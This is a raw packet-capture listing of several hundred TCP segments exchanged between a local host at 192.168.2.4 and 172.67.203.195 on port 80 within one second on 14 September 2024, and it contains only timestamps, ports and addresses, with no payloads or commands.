Sep 14, 2024 18:31:11.033788919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033793926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.033801079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033812046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.033823013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.033847094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.033876896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.079183102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079204082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079216003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079226971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079236984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079247952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079294920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079313993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079324961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079335928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079339981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.079348087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079360008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079427958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.079427958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.079505920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079519033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.079561949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.080512047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080523968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080533981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080563068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080573082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080574989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.080585003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080596924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080626965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.080662966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.080688000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.080738068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082402945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082416058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082427025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082479000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082479954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082492113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082504034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082515001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082578897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082585096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082596064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082606077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082616091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082617998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082637072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082638025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082649946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082659006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082684040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.082688093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082700014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.082741022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.083775043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083830118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083838940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.083839893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083892107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083903074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083920956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083925962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.083934069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083950043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.083981991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.083992958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.083995104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084009886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084059000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084100008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084112883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084122896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084135056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084146976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084156990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084160089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084170103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084178925 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084204912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084223986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084249973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084263086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084273100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084285975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084305048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084307909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084316969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084340096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084357977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084418058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084429979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084443092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084453106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084465027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084471941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084477901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084492922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084543943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084572077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084583044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084599972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084614038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084625006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084626913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084638119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084649086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084661007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.084664106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084685087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084718943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.084732056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085094929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085104942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085114956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085127115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085176945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085189104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085201025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085205078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085213900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085227013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085231066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085257053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085288048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085356951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085483074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085493088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085503101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085513115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085529089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085537910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085539103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085551977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085562944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085563898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085576057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085587025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085604906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085607052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085617065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085628033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085628033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085669994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085721970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085732937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085743904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085753918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085771084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085778952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085781097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085794926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085803032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.085809946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085830927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.085860968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.094521999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094537020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094549894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094562054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094588041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.094595909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094609976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094640970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.094665051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094677925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.094696045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.094736099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.121506929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121525049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121536970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121546984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121557951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121570110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121602058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.121637106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.121721029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.121896029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.166555882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166568995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166579962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166591883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166603088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166616917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166640997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166651011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166661978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166671991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166687965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166697979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166707993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166718006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.166752100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.166852951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.167438030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167483091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167494059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167532921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.167618036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167628050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167638063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167649031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167656898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.167690992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.167725086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169270039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169280052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169296026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169312000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169325113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169379950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169383049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169390917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169403076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169413090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169429064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169461966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169473886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169485092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169513941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169524908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169528961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169536114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169549942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169570923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169601917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.169605970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.169671059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.170682907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170701981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170712948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170772076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.170789003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170799971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170810938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170821905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170831919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170866013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.170891047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.170898914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170908928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170919895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.170953035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.170989990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171001911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171013117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171025038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171044111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171058893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171068907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171080112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171082020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171092987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171106100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171143055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171192884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171204090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171215057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171226978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171246052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171278954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171291113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171303034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171314001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171329021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171343088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171344995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171402931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171403885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171432972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171454906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171466112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171505928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171509981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171524048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171535015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171545982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171557903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171564102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171583891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171586037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171597004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.171628952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.171663046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172008991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172022104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172032118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172075033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172080040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172086954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172099113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172110081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172122955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172161102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172169924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172183990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172198057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172214031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172225952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172235012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172255993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172262907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172256947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172274113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172319889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172352076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172370911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172382116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172393084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172403097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172434092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172451973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172462940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172472954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172483921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172503948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172537088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172549963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172560930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172570944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172581911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172599077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172602892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172610998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172624111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172626019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.172641993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.172683001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.181596994 CEST	80	49738	172.67.203.195	192.168.2.4
